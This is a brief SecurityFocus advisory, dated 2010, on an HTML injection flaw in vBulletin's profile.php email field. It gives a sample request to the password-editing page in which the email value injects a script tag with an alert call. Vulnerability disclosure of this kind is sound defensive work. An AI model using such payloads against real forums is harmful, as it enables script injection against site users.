VBulletin Profile.PHP Email Field HTML Injection Vulnerability

These issues can be exploited through use of a web client.

The following example has been provided:

http://www.example.com//forum/profile.php?do=editpassword
pass:your pass
email: example@www.example.com�><script>alert(1)</script>.nomatt


 

Privacy Statement
Copyright 2010, SecurityFocus